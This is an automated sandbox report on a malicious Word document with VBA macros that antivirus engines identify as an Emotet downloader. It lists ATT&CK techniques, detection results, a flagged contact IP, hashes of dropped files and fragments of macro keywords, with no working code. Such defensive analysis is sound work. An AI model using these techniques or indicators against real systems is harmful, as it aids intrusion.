| Default Accounts | Scripting12 | Boot or Logon Initialization Scripts | Process Injection11 | Scripting12 | LSASS Memory | System Service Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | Native API1 | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information21 | Security Account Manager | File and Directory Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | Exploitation for Client Execution11 | Logon Script (Mac) | Logon Script (Mac) | Software Packing1 | NTDS | System Information Discovery17 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
| Cloud Accounts | Command and Scripting Interpreter1 | Network Logon Script | Network Logon Script | File Deletion1 | LSA Secrets | Security Software Discovery111 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
| Replication Through Removable Media | Service Execution11 | Rc.common | Rc.common | Masquerading231 | Cached Domain Credentials | Virtualization/Sandbox Evasion1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion1 | DCSync | Process Discovery2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection11 | Proc Filesystem | Application Window Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
| Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories1 | /etc/passwd and /etc/shadow | Remote System Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
Behavior Graph |
|---|
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetScreenshots |
|---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
|---|
Initial Sample |
|---|
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 62% | Virustotal | Browse | ||
| 46% | Metadefender | Browse | ||
| 72% | ReversingLabs | Document-Word.Trojan.Valyria | ||
| 100% | Avira | HEUR/Macro.Downloader.MRYT.Gen | ||
| 100% | Joe Sandbox ML |
Dropped Files |
|---|
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 100% | Avira | TR/Casdet.xqfgu | ||
| 100% | Joe Sandbox ML | |||
| 41% | Metadefender | Browse | ||
| 64% | ReversingLabs | Win32.Trojan.Malrep |
Unpacked PE Files |
|---|
| Source | Detection | Scanner | Label | Link | Download |
|---|---|---|---|---|---|
| 100% | Avira | TR/Crypt.XPACK.Gen | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Crypt.XPACK.Gen | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/AD.Emotet.fao | Download File | ||
| 100% | Avira | TR/Crypt.XPACK.Gen | Download File | ||
| 100% | Avira | TR/AD.Emotet.fao | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Crypt.XPACK.Gen | Download File | ||
| 100% | Avira | TR/Crypt.XPACK.Gen | Download File | ||
| 100% | Avira | TR/AD.Emotet.fao | Download File | ||
| 100% | Avira | TR/AD.Emotet.fao | Download File | ||
| 100% | Avira | TR/AD.Emotet.fao | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/AD.Emotet.fao | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/AD.Emotet.fao | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Crypt.XPACK.Gen | Download File | ||
| 100% | Avira | TR/AD.Emotet.fao | Download File | ||
| 100% | Avira | TR/AD.Emotet.fao | Download File | ||
| 100% | Avira | TR/Dropper.Gen | Download File | ||
| 100% | Avira | TR/Crypt.XPACK.Gen | Download File | ||
| 100% | Avira | TR/Crypt.XPACK.Gen | Download File | ||
| 100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
|---|
| No Antivirus matches |
|---|
URLs |
|---|
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | URL Reputation | safe | ||
| 0% | Avira URL Cloud | safe | ||
| 0% | Avira URL Cloud | safe |
Domains and IPs |
|---|
Contacted Domains |
|---|
| No contacted domains info |
|---|
URLs from Memory and Binaries |
|---|
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| false |
| low | ||
| false |
| unknown | ||
| false | high | |||
| false |
| unknown |
Contacted IPs |
|---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
|---|
| IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|---|
| 177.130.51.198 | unknown | Brazil | 52747 | WspServicosdeTelecomunicacoesLtdaBR | true |
General Information |
|---|
| Joe Sandbox Version: | 31.0.0 Red Diamond |
| Analysis ID: | 339446 |
| Start date: | 14.01.2021 |
| Start time: | 03:59:37 |
| Joe Sandbox Product: | CloudBasic |
| Overall analysis duration: | 0h 10m 3s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Sample file name: | sample1.bin (renamed file extension from bin to doc) |
| Cookbook file name: | defaultwindowsofficecookbook.jbs |
| Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
| Number of analysed new started processes analysed: | 17 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Detection: | MAL |
| Classification: | mal100.troj.expl.evad.winDOC@20/19@0/1 |
| EGA Information: |
|
| HDC Information: |
|
| HCA Information: |
|
| Cookbook Comments: |
|
| Warnings: | Show All
|
Simulations |
|---|
Behavior and APIs |
|---|
| Time | Type | Description |
|---|---|---|
| 04:01:45 | API Interceptor | |
| 04:01:59 | API Interceptor | |
| 04:02:01 | API Interceptor | |
| 04:02:03 | API Interceptor | |
| 04:02:05 | API Interceptor | |
| 04:02:08 | API Interceptor | |
| 04:02:10 | API Interceptor | |
| 04:02:12 | API Interceptor | |
| 04:02:15 | API Interceptor | |
| 04:02:17 | API Interceptor |
Joe Sandbox View / Context |
|---|
IPs |
|---|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| 177.130.51.198 | Get hash | malicious | Browse | ||
| Get hash | malicious | Browse | |||
| Get hash | malicious | Browse | |||
| Get hash | malicious | Browse | |||
| Get hash | malicious | Browse | |||
| Get hash | malicious | Browse | |||
| Get hash | malicious | Browse | |||
| Get hash | malicious | Browse | |||
| Get hash | malicious | Browse | |||
| Get hash | malicious | Browse | |||
| Get hash | malicious | Browse | |||
| Get hash | malicious | Browse |
Domains |
|---|
| No context |
|---|
ASN |
|---|
| Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
|---|---|---|---|---|---|
| WspServicosdeTelecomunicacoesLtdaBR | Get hash | malicious | Browse |
| |
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
| ||
| Get hash | malicious | Browse |
|
JA3 Fingerprints |
|---|
| No context |
|---|
Dropped Files |
|---|
Created / dropped Files |
|---|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 598272 |
| Entropy (8bit): | 5.856822353998229 |
| Encrypted: | false |
| SSDEEP: | 12288:FmkwUHZaSyYGKFaaGXuG7ttehnyragYqyPhU:FmkVZm2hnyDxAC |
| MD5: | 7E9AB23E4F7C98AF0A03B64E3C14D7F6 |
| SHA1: | BAD0DC91FB2929FDBF66E569257BABA97E1EC233 |
| SHA-256: | 532A6B3137804F51266923EBB06FA6DE43022C2B14F14F6785DDFDA8CA4238EE |
| SHA-512: | 014420FD9C97DBCFF01E11E385E392D8F9AB91D238A418E76C72CD1CD191D2BEE17E7442398C20BA229AD25B0461778F76A88039B1810E20E88A0FE58C434789 |
| Malicious: | false |
| Reputation: | low |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1191944 |
| Entropy (8bit): | 3.9253267830463896 |
| Encrypted: | false |
| SSDEEP: | 12288:ade8HF9kUxyxlFnsn4yA9W8MZ5axhVYGByJGZGy9e3rfTqtTfLlR1xwSaf67HNu4:me8HFmU/4yA9W89VYU7sY7yz1DsVirpI |
| MD5: | DA122309698B26E96848A6A829EEF5C1 |
| SHA1: | DFA1B8C96C19827A595EEB15B2EC5386F9746CEF |
| SHA-256: | 26585F7107FBECBA9F5282D4C1F1783441C60187057133121BD40D5C31C6149A |
| SHA-512: | 4318F2A585966FC03A86D566819F06F15A93BE1616231FC34E4C5B7F0B6317083654B7F9C446D250D91C25176853B8CEB42504419D35ECD7F8DEC4C6048B5D7D |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 600580 |
| Entropy (8bit): | 5.850565167047853 |
| Encrypted: | false |
| SSDEEP: | 12288:nmkTbcqi+vjtKTA4rWgRRtgqDnygr6Yq/PWY:nmkvdbKDnyzx35 |
| MD5: | 1D35754EDB0B7AA76891735215FC048A |
| SHA1: | E0B1C34B3C39C1F097B7A3749174D098DC51E265 |
| SHA-256: | C31DBCD8F7F979CB09159FE60B70A0C8F7A58C5E67EA8522E031F0BC5DF8A348 |
| SHA-512: | 6851E23E0FBFF103D5BDCE5CDC4D425C070D8E72BA66525CD2F85255F5BF3921C434C371B1459F184468546670AC26FD307035572E12DF84D1172517E8202A07 |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 598272 |
| Entropy (8bit): | 5.856822353998229 |
| Encrypted: | false |
| SSDEEP: | 12288:FmkwUHZaSyYGKFaaGXuG7ttehnyragYqyPhU:FmkVZm2hnyDxAC |
| MD5: | 7E9AB23E4F7C98AF0A03B64E3C14D7F6 |
| SHA1: | BAD0DC91FB2929FDBF66E569257BABA97E1EC233 |
| SHA-256: | 532A6B3137804F51266923EBB06FA6DE43022C2B14F14F6785DDFDA8CA4238EE |
| SHA-512: | 014420FD9C97DBCFF01E11E385E392D8F9AB91D238A418E76C72CD1CD191D2BEE17E7442398C20BA229AD25B0461778F76A88039B1810E20E88A0FE58C434789 |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1191944 |
| Entropy (8bit): | 3.9253267830463896 |
| Encrypted: | false |
| SSDEEP: | 12288:ade8HF9kUxyxlFnsn4yA9W8MZ5axhVYGByJGZGy9e3rfTqtTfLlR1xwSaf67HNu4:me8HFmU/4yA9W89VYU7sY7yz1DsVirpI |
| MD5: | DA122309698B26E96848A6A829EEF5C1 |
| SHA1: | DFA1B8C96C19827A595EEB15B2EC5386F9746CEF |
| SHA-256: | 26585F7107FBECBA9F5282D4C1F1783441C60187057133121BD40D5C31C6149A |
| SHA-512: | 4318F2A585966FC03A86D566819F06F15A93BE1616231FC34E4C5B7F0B6317083654B7F9C446D250D91C25176853B8CEB42504419D35ECD7F8DEC4C6048B5D7D |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 600580 |
| Entropy (8bit): | 5.850565167047853 |
| Encrypted: | false |
| SSDEEP: | 12288:nmkTbcqi+vjtKTA4rWgRRtgqDnygr6Yq/PWY:nmkvdbKDnyzx35 |
| MD5: | 1D35754EDB0B7AA76891735215FC048A |
| SHA1: | E0B1C34B3C39C1F097B7A3749174D098DC51E265 |
| SHA-256: | C31DBCD8F7F979CB09159FE60B70A0C8F7A58C5E67EA8522E031F0BC5DF8A348 |
| SHA-512: | 6851E23E0FBFF103D5BDCE5CDC4D425C070D8E72BA66525CD2F85255F5BF3921C434C371B1459F184468546670AC26FD307035572E12DF84D1172517E8202A07 |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1536 |
| Entropy (8bit): | 1.3586208805849453 |
| Encrypted: | false |
| SSDEEP: | 3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbC:IiiiiiiiiifdLloZQc8++lsJe1MzNn |
| MD5: | EAA701BCC2359F9297273D117620CA80 |
| SHA1: | D9E2AC26703E2668720A5B3E796DF52F3F52674A |
| SHA-256: | 497E3B43D545A03EE2E00324DEAC332FD13FF811F41B42F881BCAD29AE14250D |
| SHA-512: | 6F4F6936A2D454FABE565A177322B84A853DE887CBF1B10ECBFFF9D7755465AE60BFCBE66F4F949D986D103F12550B5160F614A74729DE0838DC451C76757491 |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1024 |
| Entropy (8bit): | 0.05390218305374581 |
| Encrypted: | false |
| SSDEEP: | 3:ol3lYdn:4Wn |
| MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
| SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
| SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
| SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 3660 |
| Entropy (8bit): | 4.4870215514715746 |
| Encrypted: | false |
| SSDEEP: | 96:87k/XicyByK27k/XicyByK2vk/X/c1O2vk/X/c12:87Iu27Iu2v51pv512 |
| MD5: | 5C048363FB804C47823972D53B75D3A5 |
| SHA1: | FF2FD7DCCF53FA0A6F7E4DED1080C26A6A8F97AE |
| SHA-256: | FE5D58BEC071D21ECEAD746CFCF14EEC223B18E18282DECB92D49CB8607885AA |
| SHA-512: | D74E71166AB2CEA9A0093A59D043E3D65E219E8376D34D3D3721FEBFDB916A2B1AF68D9221AC11DB1824FAF78EBD32865403404B7049EB7ED23339BB6B1AB1FB |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1604 |
| Entropy (8bit): | 4.462420567483035 |
| Encrypted: | false |
| SSDEEP: | 24:8L/XRlekwvB3qcL7Y2//XRlekwvB3qcL7c:8L/XjVFcfY2//XjVFcfc |
| MD5: | 13715C1A57AC925C6D3529F23D8A0489 |
| SHA1: | 7475EF6A91727FD8449840C0B783B3FD34D5D7F1 |
| SHA-256: | 29832B00F50E3D4E063F7C97E2430C5A0F833CB5D3A2E66C1DFE2AE990C94832 |
| SHA-512: | 4137D28186FA2B19F766D33C5592236A59535C50A60FADBB48C5FAB332596C6FF17C45EFE460846E64F9755D5C911CD5B06F0CBA80EE9A185648D3B497EE854F |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 438 |
| Entropy (8bit): | 4.369509432724656 |
| Encrypted: | false |
| SSDEEP: | 6:M6dYrtg9CMdg9CMdg9UYrtg9CMUg9UYrhMUg9CMRMUg9s:M6IgEEgEEgJgEtg9tgEytgC |
| MD5: | 9DDA3519F04FDEEB47B198EDD010E507 |
| SHA1: | AC6C4075745C0F0064ADED9504934DDA44CB30E9 |
| SHA-256: | A677F9380C0B0EB229D861D18FDDFFD4642FFCAF1ABF9007A77EC37F05F0BDBC |
| SHA-512: | 8C0372F4659764915EC4D9EBA74F71E4464F1E5C56A0B31AF05638A747790B9AD2834642D94EB0512AEA1B5D8E292D9CB0029A849A0C91244376A50EC6501667 |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 1994 |
| Entropy (8bit): | 4.504905520297006 |
| Encrypted: | false |
| SSDEEP: | 48:8C/XT3ITfhclhVMDlOcQh2C/XT3ITfhclhVMDlOcQ/:8C/XLIT5UcQh2C/XLIT5UcQ/ |
| MD5: | 2EAF88677CD16A68B2CD4263BA9E7CE0 |
| SHA1: | AA9B6C640105E9474BABBF76571C364926445178 |
| SHA-256: | 919A3D28BFBE2D4CE57DCF0A8B1400DB858BAD490FEB436C3F4EFE343EB262BB |
| SHA-512: | 7AA17F78876C1B55BBA4C8973D8420992E1C53D54667848D84B7857C6D066862C1AE9D2B83DE5A525DD45B0B6FFBF19B2D89372A42BC63A4E5BA0E2296D5140D |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 162 |
| Entropy (8bit): | 2.431160061181642 |
| Encrypted: | false |
| SSDEEP: | 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l |
| MD5: | 39EB3053A717C25AF84D576F6B2EBDD2 |
| SHA1: | F6157079187E865C1BAADCC2014EF58440D449CA |
| SHA-256: | CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A |
| SHA-512: | 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 162 |
| Entropy (8bit): | 2.431160061181642 |
| Encrypted: | false |
| SSDEEP: | 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l |
| MD5: | 39EB3053A717C25AF84D576F6B2EBDD2 |
| SHA1: | F6157079187E865C1BAADCC2014EF58440D449CA |
| SHA-256: | CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A |
| SHA-512: | 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Windows\System32\certutil.exe |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 446976 |
| Entropy (8bit): | 7.675102075961339 |
| Encrypted: | false |
| SSDEEP: | 12288:NWSikkQXsGOCAStP1W+TXPc9JXvaWv7j3:ESiL5Sp1W+TYfHj |
| MD5: | 706EA7F029E6BC4DBF845DB3366F9A0E |
| SHA1: | 942443DFB8784066523DB761886115E08C99575F |
| SHA-256: | FB07F875DC45E6045735513E75A83C50C78154851BD23A645D43EA853E6800AC |
| SHA-512: | 036D5DE7E732302EF81989FBA62ABB1375119FC8141748D6548ED2310E95BDC07468ADA5CBF06C4F721B2B95CAF51E3267D4EF6DB2A2031CF5C8B2ABEE1C15A3 |
| Malicious: | true |
| Antivirus: |
|
| Joe Sandbox View: | |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 162 |
| Entropy (8bit): | 2.431160061181642 |
| Encrypted: | false |
| SSDEEP: | 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l |
| MD5: | 39EB3053A717C25AF84D576F6B2EBDD2 |
| SHA1: | F6157079187E865C1BAADCC2014EF58440D449CA |
| SHA-256: | CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A |
| SHA-512: | 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 162 |
| Entropy (8bit): | 2.431160061181642 |
| Encrypted: | false |
| SSDEEP: | 3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l |
| MD5: | 39EB3053A717C25AF84D576F6B2EBDD2 |
| SHA1: | F6157079187E865C1BAADCC2014EF58440D449CA |
| SHA-256: | CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A |
| SHA-512: | 5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 595972 |
| Entropy (8bit): | 5.85065356609278 |
| Encrypted: | false |
| SSDEEP: | 12288:FmkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCY:FmkvVW9gnyQxt9 |
| MD5: | D631AB4CEFF199B52FF4E4B7AAD0199D |
| SHA1: | F30002C31BF32184507182100942A2012F0B8703 |
| SHA-256: | 9DE083F693C144A38D697089F6560A2EFE81B1AD1C5385EC07D6B41BB54B8FFE |
| SHA-512: | 56B3941CD93658F7DF8976213E2DFD5CB74E7ABB651AD26FDA9B7191E675E03289366B32EEDF68D139562A88DBBAE2589FDA8ABBDB756C43E2E605863459A162 |
| Malicious: | false |
| Preview: |
|
| Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
| File Type: | |
| Category: | dropped |
| Size (bytes): | 595972 |
| Entropy (8bit): | 5.85065356609278 |
| Encrypted: | false |
| SSDEEP: | 12288:FmkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCY:FmkvVW9gnyQxt9 |
| MD5: | D631AB4CEFF199B52FF4E4B7AAD0199D |
| SHA1: | F30002C31BF32184507182100942A2012F0B8703 |
| SHA-256: | 9DE083F693C144A38D697089F6560A2EFE81B1AD1C5385EC07D6B41BB54B8FFE |
| SHA-512: | 56B3941CD93658F7DF8976213E2DFD5CB74E7ABB651AD26FDA9B7191E675E03289366B32EEDF68D139562A88DBBAE2589FDA8ABBDB756C43E2E605863459A162 |
| Malicious: | false |
| Preview: |
|
Static File Info |
|---|
General | |
|---|---|
| File type: | |
| Entropy (8bit): | 6.919205506848504 |
| TrID: |
|
| File name: | sample1.doc |
| File size: | 850432 |
| MD5: | 7dbd8ecfada1d39a81a58c9468b91039 |
| SHA1: | 0d21e2742204d1f98f6fcabe0544570fd6857dd3 |
| SHA256: | dc40e48d2eb0e57cd16b1792bdccc185440f632783c7bcc87c955e1d4e88fc95 |
| SHA512: | a851ac80b43ebdb8e990c2eb3daabb456516fc40bb43c9f76d0112674dbd6264efce881520744f0502f2962fc0bb4024e7d73ea66d56bc87c0cc6dfde2ab869a |
| SSDEEP: | 12288:emkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCspBZZLFLIx/mBDOq1a:emkvVW9gnyQxtN9eEBDOQa |
| File Content Preview: | ........................>.......................g...........j...............Z...[...\...]...^..._...`...a...b...c...d...e...f.................................................................................................................................. |
File Icon |
|---|
 | |
| Icon Hash: | e4eea2aaa4b4b4a4 |
Static OLE Info |
|---|
General | ||
|---|---|---|
| Document Type: | OLE | |
| Number of OLE Files: | 1 | |
OLE File "sample1.doc" |
|---|
Indicators | |
|---|---|
| Has Summary Info: | True |
| Application Name: | Microsoft Office Word |
| Encrypted Document: | False |
| Contains Word Document Stream: | True |
| Contains Workbook/Book Stream: | False |
| Contains PowerPoint Document Stream: | False |
| Contains Visio Document Stream: | False |
| Contains ObjectPool Stream: | |
| Flash Objects Count: | |
| Contains VBA Macros: | True |
Summary | |
|---|---|
| Code Page: | 1252 |
| Title: | |
| Subject: | |
| Author: | |
| Keywords: | |
| Comments: | |
| Template: | |
| Last Saved By: | |
| Revion Number: | 7 |
| Total Edit Time: | 1200 |
| Create Time: | 2020-05-10 00:31:00 |
| Last Saved Time: | 2020-10-28 04:44:00 |
| Number of Pages: | 2 |
| Number of Words: | 89482 |
| Number of Characters: | 510049 |
| Creating Application: | |
| Security: | 0 |
Document Summary | |
|---|---|
| Document Code Page: | 1252 |
| Number of Lines: | 4250 |
| Number of Paragraphs: | 1196 |
| Thumbnail Scaling Desired: | False |
| Company: | |
| Contains Dirty Links: | False |
| Shared Document: | False |
| Changed Hyperlinks: | False |
| Application Version: | 1048576 |
Streams with VBA |
|---|
VBA File Name: ThisDocument.cls, Stream Size: 3696 |
|---|
General | |
|---|---|
| Stream Path: | Macros/VBA/ThisDocument |
| VBA File Name: | ThisDocument.cls |
| Stream Size: | 3696 |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . . ' E . . . . . . . . . . . . . . . . . . . ( . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . S l e e p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . |
| Data Raw: | 01 16 03 00 00 18 01 00 00 dc 06 00 00 fc 00 00 00 02 02 00 00 ff ff ff ff e3 06 00 00 7b 0b 00 00 00 00 00 00 01 00 00 00 f1 27 45 f5 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 28 00 00 00 00 00 32 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 6c 65 65 70 00 00 00 ff ff ff ff 01 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 |
VBA Code Keywords |
|---|
| Keyword |
|---|
| #Else |
| VB_Name |
| VB_Creatable |
| ".pdf"): |
| SetTask(Task |
| VB_Exposed |
| Null, |
| Form_Close() |
| ("doc"): |
| Formt, |
| VB_TemplateDerived |
| Function |
| (ByVal |
| String |
| Right(Range.Text, |
| String) |
| Form_Close |
| Long) |
| Long, |
| VB_Customizable |
| Task, |
| ("xls"): |
| FileName:=STP |
| ".xls |
| PtrSafe |
| Left(ActiveDocument.Paragraphs(One).Range.Text, |
| Declare |
| "ThisDocument" |
| SetTask |
| False |
| FileFormat:=wdFormatText |
| Attribute |
| Private |
| VB_PredeclaredId |
| Sleep |
| VB_GlobalNameSpace |
| VB_Base |
| ".pdf,In") |
| Document_Close() |
VBA Code |
|---|
|
Streams |
|---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 114 |
|---|
General | |
|---|---|
| Stream Path: | \x1CompObj |
| File Type: | data |
| Stream Size: | 114 |
| Entropy: | 4.2359563651 |
| Base64 Encoded: | True |
| Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . . |
| Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
|---|
General | |
|---|---|
